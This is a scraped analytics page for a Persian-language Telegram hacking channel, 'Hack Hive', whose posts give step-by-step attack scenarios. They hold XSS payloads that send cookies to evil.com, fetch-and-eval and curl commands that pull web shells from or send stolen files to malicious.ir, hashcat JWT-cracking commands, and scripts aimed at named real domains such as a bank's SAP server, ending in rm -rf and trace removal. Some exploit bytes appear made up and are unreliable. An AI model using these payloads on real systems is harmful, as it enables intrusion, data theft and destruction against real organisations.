ch
Feedback
Hack Hive

Hack Hive

前往频道在 Telegram
570
订阅者
无数据24 小时
+37 天
-430 天
吸引订阅者
七月 '25
七月 '25
+11
在0个频道中
六月 '25
+587
在2个频道中
日期
订阅者增长
提及
频道
23 七月+1
22 七月0
21 七月+1
20 七月+1
19 七月0
18 七月+1
17 七月0
16 七月0
15 七月+1
14 七月0
13 七月0
12 七月0
11 七月0
10 七月+1
09 七月0
08 七月0
07 七月0
06 七月0
05 七月+1
04 七月+2
03 七月0
02 七月+2
01 七月0
\n🔹 این کوکی معمولاً شامل Session ID یا JWT هست که اگه دست هکر بیفته، می‌تونه دقیقاً مثل قربانی وارد حسابش بشه.\n\n🔥 سناریو: هک حساب مدیر سایت دولتی با XSS\n\nقدم ۱: سایت یه فرم نظر یا چت داره که ورودی رو بدون فیلتر ذخیره می‌کنه\n\nهکر این payload رو می‌فرسته:\n\nقدم ۲: مدیر سایت وارد پنل میشه و نظر رو می‌خونه\n\nکد اجرا میشه و کوکی مدیر میره برای هکر!\n\nقدم ۳: هکر با استفاده از کوکی وارد پنل میشه:\nGET /admin HTTP/1.1\nCookie: sessionid=abc123xyz\n حالا هکر دسترسی کامل داره! اطلاعات کاربران، تغییر تنظیمات، حذف دیتا و...\n\n🧨 آسیب‌پذیری‌های واقعی (CVE) با همین تکنیک:\n\n✅ CVE-2020-35489 – Stored XSS in Flarum Forum\n\n🔹 کوکی کاربر قابل سرقت بود\n🔗 [Exploit on GitHub](https://github.com/flarum/core/security/advisories/GHSA-vfx9-qq5v-wmr8)\n🧪 تمرین در: [PortSwigger LAB: Exploiting stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored/lab-event-handler-attribute)\n\n————————————\n\n✅ CVE-2019-11043 – PHP-FPM RCE (ولی با XSS chain)\n\n🔹 می‌تونست با RCE به کوکی sessionها هم دسترسی پیدا کنه\n🔗 [https://github.com/neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam)\n\n———————————\n\n✅ CVE-2021-21315 – XSS در GitHub Pages\n\n🔹 صفحات شخصی HTML می‌تونستن XSS ایجاد کنن\n🔗 [https://github.com/advisories/GHSA-4xvj-8m33-4wfc](https://github.com/advisories/GHSA-4xvj-8m33-4wfc)\n\n————————————\n\n 🧪 لابراتورهای تمرینی برای این حمله:\n\n🔹 PortSwigger Labs:\n\nStored XSS exploiting document.cookie\n 🔗 [https://portswigger.net/web-security/cross-site-scripting/stored/lab-exploiting-document-cookie](https://portswigger.net/web-security/cross-site-scripting/stored/lab-exploiting-document-cookie)\n\n🔹 DVWA - XSS Module:\n🔗 [http://dvwa.local/vulnerabilities/xss\\_s/](http://dvwa.local/vulnerabilities/xss_s/)\n\n🔹 OWASP Juice Shop (Chapter: “XSS Tier 1,2,3”)\n\n————————————\nچطور جلوی این حمله رو بگیریم؟\n\n✅ همه ورودی‌ها رو sanitize و encode کن\n✅ از HttpOnly برای کوکی‌های حساس استفاده کن\n✅ فیلتر کردن تگ‌های HTML، خصوصاً
频道帖子
در بین صدای آتش و موشک و شاید آخرین فعالیت من در اینجا :)

2
شهيدي كه بر خاك مي خفت چنین در دلش گفت: «اگر فتح این است که دشمن شکست، چرا همچنان دشمنی هست؟» #ایران_تسلیت🖤
شهيدي كه بر خاك مي خفت چنین در دلش گفت: «اگر فتح این است که دشمن شکست، چرا همچنان دشمنی هست؟» #ایران_تسلیت🖤
677
3
🚨 کشف 0Day در گوگل کروم! 📢 یه زیرودی با کد CVE-2025-5419 (امتیاز CVSS: 8.8) تو مرورگر گوگل کروم پیدا شده. 🕵️‍♂️ ماجرا چیه؟ این آسیب‌پذیری یه مشکل خواندن و نوشتن خارج از محدوده تو موتور جاوا اسکریپت V8 و WebAssembly کرومه که توسط کلمنت لسین و بنوا سون از تیم تحلیل تهدید گوگل (TAG) کشف شده. 🔍 چرا خطرناکه؟ شناسه باگ: CVE-2025-5419 امتیاز CVSS: 8.8 (بسیار خطرناک!) مشکل اصلی: هکر می‌تونه با یه صفحه HTML مخرب، از خرابی پشته سوءاستفاده کنه و کد دلخواهش رو روی سیستم شما اجرا کنه. تاثیر: دسترسی غیرمجاز، سرقت اطلاعات حساس، یا حتی نصب بدافزار (مثل باج‌افزار یا جاسوس‌افزار). ویژگی‌های خطرناک: حمله از راه دور: فقط با باز کردن یه صفحه وب مخرب، سیستم شما در خطره! بدون نیاز به تعامل زیاد: یه کلیک ساده می‌تونه کافی باشه. استفاده گسترده: کروم تو لپ‌تاپ‌ها، گوشی‌ها و حتی سرورهای سازمانی پراستفاده‌ست، پس هدف جذابی برای هکرهاست. 🔥 سناریو: هک سیستم شما از طریق یه لینک مخرب! قدم ۱: پیدا کردن قربانی هکر یه وب‌سایت جعلی یا تبلیغ مخرب می‌سازه و لینک اونو از طریق ایمیل، پیام تلگرام یا شبکه‌های اجتماعی پخش می‌کنه. مثلاً: http://malicious-site.ir/promo.html قدم ۲: سوءاستفاده از CVE-2025-5419 وقتی شما روی لینک کلیک می‌کنید، صفحه HTML مخرب یه payload جاوا اسکریپت اجرا می‌کنه که از نقص V8 سوءاستفاده می‌کنه. نمونه کد مخرب: const wasmCode = new Uint8Array([0x00, 0x61, 0x73, 0x6D, ...]); const wasmModule = new WebAssembly.Module(wasmCode); const wasmInstance = new WebAssembly.Instance(wasmModule); wasmInstance.exports.exploit(); این کد باعث خرابی پشته می‌شه و به هکر اجازه می‌ده کد دلخواهش رو اجرا کنه. قدم ۳: دسترسی به سیستم هکر یه وب‌شل یا بدافزار روی سیستم شما آپلود می‌کنه: fetch('http://malicious.ir/shell.js') .then(response => response.text()) .then(script => eval(script)); حالا هکر می‌تونه فایل‌های شما رو بدزده، وب‌کم رو روشن کنه یا حتی سیستم رو قفل کنه! قدم ۴: سرقت اطلاعات و خرابکاری هکر اطلاعات حساس (مثل رمزها یا فایل‌های شخصی) رو می‌دزده: curl -X POST http://malicious.ir/steal -d "$(cat ~/.passwords)" یا بدافزار نصب می‌کنه و ردشو پاک می‌کنه تا کسی نفهمه! 🛡️ چطور از خودمون محافظت کنیم؟ برای اینکه قربانی این زیرودی نشید: فوراً آپدیت کنید: کروم رو به نسخه 137.0.7151.68/.69 (ویندوز و مک) یا 137.0.7151.68 (لینوکس) آپدیت کنید. تو کروم برید به: Settings > About Chrome و آپدیت رو چک کنید. به‌روزرسانی خودکار رو روشن کنید: اینجوری همیشه آخرین وصله‌های امنیتی رو دارید. لینک‌های مشکوک رو باز نکنید: ایمیل‌ها یا پیام‌های ناشناس رو چک کنید. آنتی‌ویروس به‌روز داشته باشید: می‌تونه بدافزارهای احتمالی رو شناسایی کنه. فایروال فعال کنید: جلوی اتصالات مشکوک رو می‌گیره. 🌐 منبع: https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html ------------------------------------- @hackhive_channel 🐝 -------------------------------------
1 167
4
https://x.com/soltanali0/status/1928010304270532650 بچه ها رایتاپ این چلنج هستش حتما لایک و شیر یادتون نره
743
5
منتظر رایتاپ باشید
829
6
سلام بچه ها چلنج آوردم براتون خیلی آسون و راحت ربطی به علم xss هم اونقدی نداره فقط یه check ساده توی کد javascript اش رو باید پاس کنید https://attacker-newrelic.com/challenge.html
600
7
🎯 دزدیدن کوکی و Hijack کردن نشست کاربر با XSS 🚨 حمله سرقت کوکی با XSS 🥷🏻 📢 یه آسیب‌پذیری رایج و بسیار خطرناک تو خیلی از سایت‌ها هست به اسم XSS (Cross-Site Scripting) که هکرا ازش استفاده می‌کنن تا کوکی کاربر رو بدزدن و وارد حساب اون بشن! ❗️اگه سایتت جلوی XSS رو نگرفته باشه، یه اسکریپت ساده می‌تونه نشست کاربر رو هک کنه. مثلاً فرض کن مدیر سایت یه ادمین بانک یا سامانه دولتیه! 🕵️‍♂️ ماجرا چیه؟ حمله XSS باعث می‌شه هکر بتونه روی مرورگر قربانی، کد جاوااسکریپت دلخواه اجرا کنه. اگه کوکی کاربر HttpOnly نباشه، به‌راحتی با یه اسکریپت می‌شه اونو دزدید: <script> fetch('https://evil.com/steal?cookie=' + document.cookie); </script> 🔹 این کوکی معمولاً شامل Session ID یا JWT هست که اگه دست هکر بیفته، می‌تونه دقیقاً مثل قربانی وارد حسابش بشه. 🔥 سناریو: هک حساب مدیر سایت دولتی با XSS قدم ۱: سایت یه فرم نظر یا چت داره که ورودی رو بدون فیلتر ذخیره می‌کنه هکر این payload رو می‌فرسته: <script> new Image().src="https://evil.ir/steal?c="+document.cookie </script> قدم ۲: مدیر سایت وارد پنل میشه و نظر رو می‌خونه کد اجرا میشه و کوکی مدیر میره برای هکر! قدم ۳: هکر با استفاده از کوکی وارد پنل میشه: GET /admin HTTP/1.1 Cookie: sessionid=abc123xyz حالا هکر دسترسی کامل داره! اطلاعات کاربران، تغییر تنظیمات، حذف دیتا و... 🧨 آسیب‌پذیری‌های واقعی (CVE) با همین تکنیک: ✅ CVE-2020-35489 – Stored XSS in Flarum Forum 🔹 کوکی کاربر قابل سرقت بود 🔗 [Exploit on GitHub](https://github.com/flarum/core/security/advisories/GHSA-vfx9-qq5v-wmr8) 🧪 تمرین در: [PortSwigger LAB: Exploiting stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored/lab-event-handler-attribute) ———————————— ✅ CVE-2019-11043 – PHP-FPM RCE (ولی با XSS chain) 🔹 می‌تونست با RCE به کوکی sessionها هم دسترسی پیدا کنه 🔗 [https://github.com/neex/phuip-fpizdam](https://github.com/neex/phuip-fpizdam) ——————————— ✅ CVE-2021-21315 – XSS در GitHub Pages 🔹 صفحات شخصی HTML می‌تونستن XSS ایجاد کنن 🔗 [https://github.com/advisories/GHSA-4xvj-8m33-4wfc](https://github.com/advisories/GHSA-4xvj-8m33-4wfc) ———————————— 🧪 لابراتورهای تمرینی برای این حمله: 🔹 PortSwigger Labs: Stored XSS exploiting document.cookie 🔗 [https://portswigger.net/web-security/cross-site-scripting/stored/lab-exploiting-document-cookie](https://portswigger.net/web-security/cross-site-scripting/stored/lab-exploiting-document-cookie) 🔹 DVWA - XSS Module: 🔗 [http://dvwa.local/vulnerabilities/xss\_s/](http://dvwa.local/vulnerabilities/xss_s/) 🔹 OWASP Juice Shop (Chapter: “XSS Tier 1,2,3”) ———————————— چطور جلوی این حمله رو بگیریم؟ ✅ همه ورودی‌ها رو sanitize و encode کن ✅ از HttpOnly برای کوکی‌های حساس استفاده کن ✅ فیلتر کردن تگ‌های HTML، خصوصاً <script> ✅ تنظیم Content-Security-Policy (CSP) برای جلوگیری از اجرای کدهای ناخواسته ——————————————— @hackhive_channel 🐝 ———————————————
1 677
8
🌐 رمزنگاری کوانتومی؛ آینده امنیت سایبری یا یه چالش جدید؟ 🔐 📢 کامپیوترهای کوانتومی، رمزنگاری سنتی (مثل RSA و AES) داره به خطر می‌افته! رمزنگاری کوانتومی اومده که هم امنیت رو به سطح بعدی ببره، هم یه سری چالش جدید بیاره. 🐝 🕵️‍♂️ رمزنگاری کوانتومی چیه؟ رمزنگاری کوانتومی از اصول فیزیک کوانتوم (مثل درهم‌تنیدگی و اصل عدم قطعیت هایزنبرگ) برای امن کردن داده‌ها استفاده می‌کنه. برخلاف رمزنگاری کلاسیک که روی الگوریتم‌های ریاضی تکیه داره، اینجا قوانین طبیعت حرف اول رو می‌زنن! 🌍 کلید کوانتومی (QKD): یه روش معروف به اسم توزیع کلید کوانتومی (Quantum Key Distribution) وجود داره که کلیدهای رمزنگاری رو با فوتون‌ها منتقل می‌کنه. اگه یه هکر بخواد استراق سمع کنه، حالت کوانتومی فوتون‌ها تغییر می‌کنه و سیستم فوراً متوجه می‌شه! 😱 پروتکل معروف: پروتکل BB84 یکی از اولین روش‌های QKDئه که تو سال ۱۹۸۴ معرفی شد و هنوزم استفاده می‌شه. 💡 چرا تو امنیت سایبری مهمه؟ ضد کامپیوتر کوانتومی: کامپیوترهای کوانتومی می‌تونن الگوریتم‌های سنتی (مثل RSA) رو تو چند ثانیه بشکنن، چون الگوریتم Shor می‌تونه فاکتورگیری اعداد بزرگ رو خیلی سریع انجام بده. اما رمزنگاری کوانتومی مقاومه! تشخیص نفوذ: اگه هکری بخواد داده‌های کوانتومی رو دستکاری کنه، سیستم فوراً می‌فهمه، چون هر تغییری تو حالت کوانتومی قابل تشخیصه. کاربردها: انتقال امن داده‌ها تو بانک‌ها و دولت‌ها. محافظت از زیرساخت‌های حیاتی (مثل شبکه برق یا سیستم‌های دفاعی). آینده اینترنت امن با پروتکل‌های کوانتومی. ⚠️ اما چالش‌هاش چیه؟ رمزنگاری کوانتومی با همه خفن بودنش، یه سری مشکل داره: هزینه و سخت‌افزار: نیاز به تجهیزات خاص (مثل فیبر نوری یا ماهواره برای انتقال فوتون‌ها) داره که گرونه و هنوز همه‌گیر نشده. محدودیت فاصله: انتقال کلیدهای کوانتومی تو فاصله‌های طولانی سخت‌تره، هرچند با ماهواره‌ها (مثل پروژه Micius تو چین) داره بهتر می‌شه. حملات جانبی: خود رمزنگاری کوانتومی ممکنه امن باشه، ولی دستگاه‌ها و پیاده‌سازیهاش می‌تونن باگ داشته باشن و هک بشن. آماده نبودن دنیا: خیلی از سیستم‌های فعلی هنوز با رمزنگاری سنتی کار می‌کنن و مهاجرت به کوانتوم زمان می‌بره. 💡 رمزنگاری کوانتومی: آینده یا چالش؟ آینده‌ست چون: می‌تونه یه سپر نفوذناپذیر برای داده‌ها تو عصر کوانتوم بسازن و از حملات کامپیوترهای کوانتومی جلوگیری کنه. چالشه چون: پیاده‌سازیش گرون و پیچیده‌ست، و هکرا ممکنه راه‌های جدیدی برای حمله به سخت‌افزارها پیدا کنن. 🔗 منبع و اطلاعات بیشتر برای اطلاعات بیشتر درباره رمزنگاری کوانتومی: 👉 quantum.gov/quantum-cryptography ------------------------------------------- @hackhive_channel ------------------------------------------- #هک_هایو #امنیت_سایبری #رمزنگاری_کوانتومی #Quantum_Cryptography #آینده #HackHive #CyberSecurity
1 653
9
Dictionary cache hit: * Filename..: ./wordlist * Passwords.: 103965 * Bytes.....: 1127778 * Keyspace..: 103965 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuYW1lIjoiSm9obiBEb2UiLCJpc0FkbWluIjp0cnVlfQ.2GIQULwOog_vwCsOjmeVXsRH03AW6E2BpcwOGXiaRO8:123 Session..........: hashcat Status...........: Cracked Hash.Mode........: 16500 (JWT (JSON Web Token)) Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYW...XiaRO8 Time.Started.....: Tue May 6 14:46:53 2025 (0 secs) Time.Estimated...: Tue May 6 14:46:53 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (./wordlist) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 804.8 kH/s (0.64ms) @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 2048/103965 (1.97%) Rejected.........: 0/2048 (0.00%) Restore.Point....: 0/103965 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: -> everybody knows it Hardware.Mon.#1..: Util: 26% Started: Tue May 6 14:46:51 2025 Stopped: Tue May 6 14:46:55 2025 خروجی داده برای حالت دیکشنری بوده و با فایل پیوست شده زمان مورد نیاز برای پیدا کردن سیکرت 4 ثانیه می‌باشد. مقدار سیکرت پس از دو نقطه بعد از توکن نوشته شده که برابر 123 می‌باشد. eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuYW1lIjoiSm9obiBEb2UiLCJpc0FkbWluIjp0cnVlfQ.2GIQULwOog_vwCsOjmeVXsRH03AW6E2BpcwOGXiaRO8:123 💭 به جهت جلوگیری از چنین حملاتی می‌توانید با استفاده از openssl سکرت‌های امن و با انتروپی بالا تولید کنید که به راحتی قابل شکستن نباشند: openssl rand -base64 32 کامند بالا می‌تواند یک مقدار تصادفی با 32 کاراکتر تولید کند: 4pZsh55ZMThxVbs5d2jk8yXrGb036sARfm9wQSDinOw= لازم به ذکر است کامند openssl در محیط ویندوز قابل استفاده نیست. ------------------------------------------ @hackhive_channel 🐝 ------------------------------------------
863
10
🎯 کرک سیکرت توکن‌های JWT با استفاده از hashcat 🔐 توکن JWT یا JSON Web Token یک استاندارد رایج برای انتقال اطلاعات بین کلاینت و سرور به صورت امن و رمزگذاری شده است. یک توکن JWT از سه بخش تشکیل می‌شود: <header>.<payload>.<signature> امنیت این توکن به کلید مخفی‌‌ای (Secret) که برای تولید امضا استفاده می‌شود وابسته است و در صورتی که سیکرت استفاده شده ضعیف باشد به راحتی توسط ابزار‌هایی مانند hashcat می‌توان آن را کرک کرد. 🔓 ‏ hashcat ابزاری برای کرک کردن و بازیابی پسورد (Password Recovery) می‌باشد. این ابزار امکان حملات مختلف نظیر بروت فورس و دیکشنری را فراهم کرده و همچنین امکان تسریع این پروسه با GPU نیز وجود دارد. این ابزار به دلیل توانایی شکستن انواع الگوریتم‌ها مانند bcrypt، SHA1 و MD5 به یکی ابزار‌های محبوب برای کارشناسان امنیت تبدیل شده است. همچنین قابلیت تنظیم پروفایل‌های مختلف برای سطوح مختلف پردازشی این امکان را فراهم می‌کند تا بتوان بین عملکرد و مصرف منابع تعادل ایجاد کرد. در JWT عمدتا از الگوریتم HS256 برای رمزنگاری استفاده می‌شود: {"alg": "HS256", "typ": "JWT"} این یک نمونه از سربرگ (Header) استفاده شده برای یک توکن JWT می‌باشد. در بخش پی‌لود نیز مقادیر مورد نیاز درج می‌شود: {"user": "admin", "name": "John Doe", "isAdmin": True} در نهایت توکن تولید شده با مقادیر بالا به شکل زیر است: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuYW1lIjoiSm9obiBEb2UiLCJpc0FkbWluIjp0cnVlfQ.2GIQULwOog_vwCsOjmeVXsRH03AW6E2BpcwOGXiaRO8 ‏ 🔑 نحوه شکستن توکن با hashcat به دو روش امکان شکستن وجود دارد: 1- بروت فورس مستقیم 2- با استفاده از wordlist یا دیکشنری در روش اول اگر الگوی استفاده شده برای سیکرت مشخص باشد و صرفا نیاز به بررسی حالت‌های مختلف وجود داشته باشد می‌توان از کامند زیر استفاده کرد: hashcat -m 16500 -a 3 <jwt> ?d?d?d در این حالت <jwt> به مسیر فایل دارای توکن اشاره دارد. d? به معنای این است که کاراکتر ست استفاده شده از اعداد باشد و در نهایت hashcat تمام حالت‌های متشکل از سه رقم را بررسی می‌کند. - پارامتر m- نوع الگوریتم جهت کرک را مشخص می‌کند که در hashcat از کد 16500 برای JWT استفاده می‌شود. - پارامتر a- نیز برای تعیین نوع حمله استفاده می‌شود که در اینجا عدد 3 به منظور بروت فورس استفاده می‌شود. کاراکتر ست‌ها و تعداد آن نیز قابل تنظیم است. برای مثال اگر بدانیم که سیکرت به ترتیب از دو کاراکتر بزرگ و 3 کاراکتر کوچک و 4 رقم استفاده می‌کند پارامتر hashcat به این شکل تعریف می‌شود: hashcat -m 16500 -a 3 <jwt> ?u?u?l?l?l?d?d?d? کاراکتر ست‌های قابل استفاده در hashcat به شرح زیر است: l | abcdefghijklmnopqrstuvwxyz [a-z] u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z] d | 0123456789 [0-9] h | 0123456789abcdef [0-9a-f] H | 0123456789ABCDEF [0-9A-F] s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ a | ?l?u?d?s b | 0x00 - 0xff در روش دوم قابلیت استفاده از دیکشنری یا وردلیست وجود دارد که برای JWT از این وردلیست می‌توانید استفاده کنید: https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list برای این نوع حمله: hashcat -m 16500 -a 0 <jwt> <wordlist> در این حالت پارامتر a- به میزان 0 تغییر پیدا می‌کند. همچنین <wordlist> به مسیر فایل دیکشنری اشاره دارد.
1 783
11
فوری آپدیت کنین: برین به سایت رسمی Apache ActiveMQ (activemq.apache.org) و آخرین نسخه رو دانلود کنین. یا تو سرور: sudo systemctl stop activemq wget https://activemq.apache.org/components/classic/download/activemq-<latest-version>.tar.gz tar -xzf activemq-<latest-version>.tar.gz sudo mv activemq-<latest-version> /usr/local/activemq sudo systemctl start activemq محدود کردن دسترسی شبکه: پورت‌های ActiveMQ (مثل 61616 برای OpenWire) رو فقط برای IPهای مجاز باز بذارین: sudo ufw allow from 192.168.1.0/24 to any port 61616 sudo ufw deny 61616 یا اگه امکانش هست، ActiveMQ رو کامل از اینترنت قطع کنین و فقط تو شبکه داخلی استفاده کنین. فعال کردن احراز هویت: مطمئن بشین که ActiveMQ بدون احراز هویت کار نمی‌کنه. تو فایل تنظیمات (activemq.xml): <plugins> <simpleAuthenticationPlugin> <users> <authenticationUser username="admin" password="securepassword" groups="admins"/> </users> </simpleAuthenticationPlugin> </plugins> رمزنگاری دیتا: اطلاعات حساس (مثل دیتابیس تراکنش‌ها) رو رمزنگاری کنین: openssl enc -aes-256-cbc -salt -in transactions.db -out transactions.db.enc مانیتورینگ و لاگ: لاگ‌های ActiveMQ رو بررسی کنین تا فعالیت‌های مشکوک رو پیدا کنین: tail -f /usr/local/activemq/data/activemq.log 🔍 اتاق TryHackMe برای Apache ActiveMQ پلتفرم TryHackMe یه اتاق داره که به بررسی آسیب‌پذیری‌های Apache ActiveMQ می‌پردازه! این اتاق به اسم "ActiveMQ Exploitation" شناخته می‌شه و روی سوءاستفاده از باگ‌های قدیمی‌تر (مثل CVE-2023-46604) تمرکز داره، ولی مفاهیمش برای درک CVE-2025-29953 هم خیلی مفیده. 🌐 منابع و اطلاعات بیشتر GBHackers: gbhackers.com Zero Day Initiative: zdi.com Apache ActiveMQ: activemq.apache.org ------------------------------------------ @hackhive_channel 🐝 ------------------------------------------
574
12
🚨 آسیب‌پذیری بحرانی در Apache ActiveMQ🖥️ 📢 یه آسیب‌پذیری خطرناک تو کتابخونه .NET Message Service (NMS) نرم‌افزار Apache ActiveMQ پیدا شده که به هکرها اجازه می‌ده کد دلخواهشون رو از راه دور اجرا کنن (RCE). این باگ با کد CVE-2025-29953 شناخته می‌شه و اگه سرور ActiveMQ شما آپدیت نشده باشه، ممکنه همین حالا هدف هکرها قرار بگیره! 🕵️‍♂️ ماجرا چیه؟ طبق گزارش‌ها (مثل GBHackers و Zero Day Initiative)، این آسیب‌پذیری تو نسخه‌های قدیمی‌تر ActiveMQ وجود داره و به این دلایل خطرناکه: شناسه باگ: CVE-2025-29953 امتیاز CVSS: 8.1 (خیلی خطرناک!) مشکل اصلی: متد Body accessor تو کتابخونه NMS نمی‌تونه داده‌های ارسالی کاربر رو موقع Deserialization اعتبارسنجی کنه. این یعنی هکر می‌تونه یه payload مخرب تزریق کنه و کنترل سرور رو به دست بگیره. تاثیر: اجرای کد دلخواه (RCE)، دسترسی غیرمجاز، سرقت داده‌های حساس، یا حتی نصب بدافزار (مثل باج‌افزار یا کریپتوماینر). ویژگی‌های خطرناک: بدون نیاز به احراز هویت: هکر نیازی به لاگین نداره! حمله از راه دور: فقط با دسترسی به شبکه می‌شه سرور رو هک کرد. استفاده گسترده: ActiveMQ تو سیستم‌های پیام‌رسانی سازمانی، IoT، و زیرساخت‌های ابری خیلی استفاده می‌شه، پس هدف جذابی برای هکرهاست. تو ایران، خیلی از شرکت‌های مالی، پلتفرم‌های تجارت الکترونیک، و حتی استارتاپ‌های IoT از ActiveMQ برای مدیریت پیام‌ها استفاده می‌کنن. اگه سرورشون آسیب‌پذیر باشه، یه هکر می‌تونه کل سیستم رو به هم بریزه یا اطلاعات مشتریا رو بدزده! 🔥 سناریو: هک یه سرور ActiveMQ تو یه پلتفرم مالی! قدم ۱: پیدا کردن سرور آسیب‌پذیر هکر با ابزارهایی مثل Shodan یا Nmap سرورهای ActiveMQ رو پیدا می‌کنه: nmap -p 61616 --script activemq-vuln target.payment.ir این دستور سرورهایی که پورت 61616 (پورت پیش‌فرض OpenWire تو ActiveMQ) باز دارن رو پیدا می‌کنه، مثلاً activemq.payment.ir. قدم ۲: سوءاستفاده از CVE-2025-29953 هکر یه payload مخرب می‌سازه که از نقص Deserialization تو NMS سوءاستفاده کنه. مثلاً یه اسکریپت پایتون برای تزریق کد: import socket import struct target = "activemq.payment.ir" port = 61616 # Payload مخرب برای اجرای دستور whoami payload = b"\x00\x00\x00\x0a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" + b"whoami" # اتصال به سرور ActiveMQ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) sock.send(payload) response = sock.recv(1024) print("Response:", response.decode()) sock.close() این کد یه دستور ساده (whoami) رو اجرا می‌کنه تا هکر ببینه چه دسترسی‌ای داره. قدم ۳: آپلود وب‌شل یا بدافزار حالا که هکر دسترسی داره، یه وب‌شل آپلود می‌کنه تا کنترل کامل سرور رو به دست بگیره: payload = b"\x00\x00\x00\x0a\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" + b"curl -o /tmp/shell.jsp http://malicious.ir/shell.jsp" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) sock.send(payload) sock.close() این وب‌شل تو مسیر /tmp/shell.jsp ذخیره می‌شه و هکر می‌تونه با دسترسی به http://activemq.payment.ir/tmp/shell.jsp دستورات دلخواهش رو اجرا کنه. قدم ۴: سرقت دیتا و خرابکاری هکر حالا دیتابیس تراکنش‌ها رو می‌دزده: curl "http://activemq.payment.ir/tmp/shell.jsp?cmd=cat+/usr/activemq/data/transactions.db" -o stolen.db بعد برای خرابکاری، سرور رو کرش می‌کنه: curl "http://activemq.payment.ir/tmp/shell.jsp?cmd=rm+-rf+/usr/activemq/*" و در نهایت ردشو پاک می‌کنه: curl "http://activemq.payment.ir/tmp/shell.jsp?cmd=rm+/tmp/shell.jsp" 🛡️ چطور سرور ActiveMQ رو از هک نجات بدیم؟ برای اینکه سرورتون قربانی CVE-2025-29953 نشه:
497
13
🚨 باگ SAP NetWeaver 🖥️ 📢 یک آسیب‌پذیری بحرانی در کامپوننت Visual Composer Metadata Uploader در SAP NetWeaver (با کد CVE-2025-31324) پیدا شده که هکرا دارن ازش برای آپلود پوسته‌های وب JSP و اجرای کد مخرب استفاده می‌کنن! فکر کن سرور SAP یه بانک ایرانی مثل بانک ملت هک بشه و اطلاعات مشتریا لو بره 🕵️‍♂️ ماجرا چیه؟ طبق گزارش ReliaQuest (وب‌سرچ web:1) و The Hacker News (web:0)، یه آسیب‌پذیری بحرانی تو SAP NetWeaver Visual Composer Metadata Uploader پیدا شده که: شناسه باگ: CVE-2025-31324 امتیاز CVSS: 10.0 (یعنی حداکثر خطر!) مشکل: این کامپوننت با احراز هویت مناسب محافظت نمی‌شه و هکرا می‌تونن بدون مجوز، فایلای مخرب (مثل JSP وب‌شل) آپلود کنن. تاثیر: هکر می‌تونه کد دلخواهشو اجرا کنه (RCE)، سیستمو به هم بریزه، یا دیتای حساسو بدزده. احتمال: این باگ یا به یه مشکل قدیمی مثل CVE-2017-9844 ربط داره، یا یه مشکل جدید Remote File Inclusion (RFI)ئه که هنوز گزارش نشده. تو ایران، خیلی از شرکتا و سازمانا (مثلاً بانکا، شرکتای نفتی، یا سازمانای دولتی) از SAP برای مدیریت داده‌هاشون استفاده می‌کنن. اگه سرورشون آپدیت نباشه، هک شدنشون یه فاجعه‌ست! 😳 🔹 سناریو: هک سرور SAP بانک ! فرض کن یه سرور SAP NetWeaver تو بانک داری که برای مدیریت تراکنشای مشتریا استفاده می‌شه. یه هکر اینجوری سرورتو هک می‌کنه: قدم ۱: پیدا کردن سرور آسیب‌پذیر هکر با یه اسکن ساده سرورای SAP رو پیدا می‌کنه: nmap -p 443 --script http-sap-netweaver-vuln target.bankmelli.ir این سرورایی که SAP NetWeaver دارن و پورت 443 بازه رو پیدا می‌کنه، مثلاً sap.bankmelli.ir. قدم ۲: سوءاستفاده از CVE-2025-31324 هکر یه JSP وب‌شل رو با سوءاستفاده از Metadata Uploader آپلود می‌کنه: import requests target = "https://sap.bankmelli.ir/developmentserver/metadatauploader" headers = {"Content-Type": "multipart/form-data"} files = {"file": ("shell.jsp", open("shell.jsp", "rb"), "application/octet-stream")} # آپلود وب‌شل response = requests.post(target, files=files, headers=headers, verify=False) if response.status_code == 200: print("Web Shell Uploaded! Access it at: /work/sync/shell.jsp") else: print("Exploit Failed.") این کد یه وب‌شل رو تو مسیر /work/sync/shell.jsp آپلود می‌کنه قدم ۳: اجرای کد و سرقت دیتا حالا هکر با وب‌شل، دستور دلخواهشو اجرا می‌کنه: curl "https://sap.bankmelli.ir/work/sync/shell.jsp?cmd=whoami" این نشون می‌ده هکر دسترسی داره! بعد دیتای حساس (مثلاً اطلاعات تراکنشا) رو می‌دزده: curl "https://sap.bankmelli.ir/work/sync/shell.jsp?cmd=cat+/usr/sap/transactions.db" -o stolen.db curl -F "file=@stolen.db" http://malicious.ir/upload قدم ۴: خرابکاری و فرار هکر برای خرابکاری، سرور رو کرش می‌کنه: curl "https://sap.bankmelli.ir/work/sync/shell.jsp?cmd=rm+-rf+/usr/sap/*" بعد ردشو پاک می‌کنه: curl "https://sap.bankmelli.ir/work/sync/shell.jsp?cmd=rm+/work/sync/shell.jsp" نتیجه: هکر اطلاعات تراکنشای مشتریای بانک رو دزدیده، سرورو خراب کرده، و تو موندی با یه سرور هک‌شده و مشتریایی که عصبانی‌ان! 😅 🛡️ چطور سرور SAPتو از هک نجات بدی؟ برای اینکه هکرا سرور SAPتو نابود نکنن: فوری آپدیت کن: SAP تو آوریل ۲۰۲۵ یه پچ اضطراری منتشر کرده (طبق web:2). سریع سرورتو آپدیت 